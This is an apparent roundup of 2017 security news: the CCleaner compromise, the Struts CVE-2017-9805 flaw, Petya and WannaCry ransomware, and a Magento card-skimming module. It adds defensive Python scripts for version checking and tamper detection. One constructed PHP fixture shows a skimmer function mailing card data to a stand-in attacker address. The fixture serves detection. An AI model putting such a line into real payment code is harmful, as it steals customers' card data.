CCleaner, the widely used and popular application created by Piriform and recently acquired by Avast, which has over 2 billion downloads and lets users clean up their systems to optimize and enhance performance, has been hacked.

If you downloaded or updated the CCleaner application on your computer from its official website between August 15 and September 12 of this year, your computer has been compromised.

Detected on September 13, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to the attackers' remote command-and-control servers.

The malicious software was programmed to collect a large amount of user data, including:

Computer name
List of installed software, including Windows updates
List of all running processes
IP and MAC addresses
Additional information, such as whether the process is running with admin privileges and whether it is a 64-bit system

Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised.

A critical remote code execution vulnerability has been discovered in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on affected servers.

Apache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON.

The vulnerability (CVE-2017-9805) is a programming blunder in the way Struts processes data from an untrusted source. Specifically, the Struts REST plugin fails to properly handle XML payloads when deserializing them.
 
All versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework’s REST plugin vulnerable to remote attackers.

According to one of the security researchers at LGTM, who discovered the flaw, the Struts framework is being used by "an incredibly large number and variety of organisations," including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.

"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser," Man Yue Mo, an LGTM security researcher said.

All an attacker needs to do is submit malicious XML in a particular format to trigger the vulnerability on the targeted server.

Successful exploitation of the vulnerability could allow an attacker to take full control of the affected server and, from there, move on to other systems on the same network.

Many Java applications have been affected by similar vulnerabilities in recent years.

Since this vulnerability has been patched in Struts version 2.5.13, administrators are strongly advised to upgrade their Apache Struts installations as soon as possible.

The researchers have not yet published further technical details about the vulnerability or a proof-of-concept, giving admins time to upgrade their systems.
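As an added defender-side example (not code from the advisory or from LGTM), the following script checks a Maven pom.xml for the struts2-rest-plugin dependency and reports whether its version falls inside the affected ranges stated above (2.1.2 to 2.3.33 and 2.5 to 2.5.12). The pom.xml fragment is constructed for the example; unresolved version placeholders such as ${struts.version} are reported as unknown rather than silently treated as safe.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges as stated in the advisory summary (inclusive, as 3-tuples).
AFFECTED = [((2, 1, 2), (2, 3, 33)), ((2, 5, 0), (2, 5, 12))]
FIXED = (2, 5, 13)  # first release with the fix

# Constructed sample pom.xml; not taken from any real project.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-rest-plugin</artifactId>
      <version>2.5.10</version>
    </dependency>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>2.5.10</version>
    </dependency>
  </dependencies>
</project>"""

def parse_version(text):
    """Turn '2.5' or '2.3.33' into a 3-tuple; None if no numeric version."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    if not parts:
        return None  # e.g. a Maven property placeholder like ${struts.version}
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])

def is_affected(version_text):
    """True/False for a parsable version, None when it cannot be resolved."""
    v = parse_version(version_text)
    if v is None:
        return None
    return any(lo <= v <= hi for lo, hi in AFFECTED)

def find_struts_rest_exposure(pom_xml):
    """Return [(version, affected)] for every struts2-rest-plugin dependency."""
    ns = {"m": "http://maven.apache.org/POM/4.0.0"}
    root = ET.fromstring(pom_xml)
    findings = []
    for dep in root.findall(".//m:dependency", ns):
        gid = dep.findtext("m:groupId", default="", namespaces=ns)
        aid = dep.findtext("m:artifactId", default="", namespaces=ns)
        ver = dep.findtext("m:version", default="", namespaces=ns).strip()
        if gid == "org.apache.struts" and aid == "struts2-rest-plugin":
            findings.append((ver, is_affected(ver)))
    return findings

if __name__ == "__main__":
    print(find_struts_rest_exposure(SAMPLE_POM))  # [('2.5.10', True)]
```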


Organizations in Europe and the US have been crippled by a ransomware attack known as ‘Petya’. The malicious software has spread through large firms including the advertiser WPP, food company Mondelez, legal firm DLA Piper and Danish shipping and transport firm Maersk, leading to PCs and data being locked up and held for ransom.

It’s the second major global ransomware attack in the last two months. In early May, Britain’s National Health Service (NHS) was among the organizations infected by WannaCry, which used a vulnerability first revealed to the public as part of a leaked stash of NSA-related documents released online in April by a hacker group calling itself the Shadow Brokers. Like WannaCry, ‘Petya’ spreads rapidly through networks that use Microsoft Windows.

The ransomware takes over computers and demands $300, paid in Bitcoin. Once one computer is infected, the malicious software spreads rapidly across the organization using the EternalBlue vulnerability in Microsoft Windows.

The ransomware infects computers and then waits for about an hour before rebooting the machine. While the machine is rebooting, you can switch the computer off to prevent the files from being encrypted and try to rescue the files from the machine. If you are infected and the system reboots with the ransom note, don’t pay the ransom: the “customer service” email address has been shut down, so there is no way to get the decryption key to unlock your files anyway. Disconnect your PC from the internet, reformat the hard drive and restore your files from a backup. Back up your files regularly and keep your anti-virus software up to date.

A massive ransomware campaign has hit the computer systems of hundreds of private companies and public organizations across the globe, in what is believed to be the largest ransomware delivery campaign to date.

The ransomware in question has been identified as a variant known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other ransomware variants, WannaCry also blocks access to a computer, encrypts its files and demands money (bitcoin) to unlock it.
 
Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in bitcoin in order to remove the infection from their PCs; otherwise, their PCs are rendered unusable and their files remain locked.
 

How to Protect Yourself from WannaCry

Magento Realex Payments extension hacked to steal payment card data. Experts at Sucuri are observing massive attacks.

Cybercriminals are targeting the Magento platform to steal credit card data. The thieves have been abusing a payment module to steal payment card data from online shops running on the popular Magento e-commerce platform.

According to experts at security firm Sucuri, the module the hackers are targeting is the Realex Payments Magento extension (SF9), which integrates with the Realex Realauth Remote payment gateway.

The extension allows the administrators of Magento installs to process mail and telephone orders by entering the payment details.

The experts highlighted that the Realex Payments extension is not affected by any vulnerability; the attackers abuse it only once the Magento installation itself has been compromised.

The researchers at Sucuri noticed that crooks added a malicious function called sendCcNumber() to an SF9 file named Remote.php.

The function gathers personal and financial data entered by users and sends it back to an email address controlled by the attacker.
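As an added detection example (not code from Sucuri or from the extension), the following script compares the function definitions found in an extension's PHP files against a known-good baseline, so that an added function such as sendCcNumber() in Remote.php stands out, and it also flags direct mail() calls, since the reported skimmer emailed the stolen data to the attacker. The file path, class name and PHP source below are constructed for the example; only the function name sendCcNumber and the file name Remote.php come from the report.

```python
import re

# Constructed baseline: function names expected in each file of a clean install.
# In practice this would be generated from a pristine copy of the extension.
BASELINE_FILES = {
    "app/code/community/SF9/Realex/Model/Remote.php": {"_construct", "authorize", "capture"},
}

# Constructed tampered file: the class body is invented for the example; the
# injected function name matches the one Sucuri reported in Remote.php.
TAMPERED_REMOTE_PHP = """<?php
class SF9_Realex_Model_Remote extends Mage_Payment_Model_Method_Abstract {
    public function _construct() { parent::_construct(); }
    public function authorize(Varien_Object $payment, $amount) { return $this; }
    public function capture(Varien_Object $payment, $amount) { return $this; }
    private function sendCcNumber($data) {
        mail('attacker@example.invalid', 'cc', serialize($data));
    }
}
"""

# Named PHP function/method definitions (anonymous closures are skipped).
FUNC_RE = re.compile(r"\bfunction\s+&?\s*([A-Za-z_]\w*)\s*\(")
MAIL_RE = re.compile(r"(?<![\w$>])mail\s*\(")

def php_functions(source):
    """Set of function names defined in a PHP source string."""
    return set(FUNC_RE.findall(source))

def unexpected_functions(path, source, baseline=BASELINE_FILES):
    """Sorted names not in the baseline for this path; None if path unknown."""
    expected = baseline.get(path)
    if expected is None:
        return None  # file not in baseline: review it separately
    return sorted(php_functions(source) - expected)

def mail_call_lines(source):
    """1-based line numbers containing a direct mail() call."""
    return [i for i, line in enumerate(source.splitlines(), 1) if MAIL_RE.search(line)]

def audit_file(path, source):
    """Summarise findings for one extension file."""
    return {"added_functions": unexpected_functions(path, source),
            "mail_calls": mail_call_lines(source)}

if __name__ == "__main__":
    print(audit_file("app/code/community/SF9/Realex/Model/Remote.php", TAMPERED_REMOTE_PHP))
```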
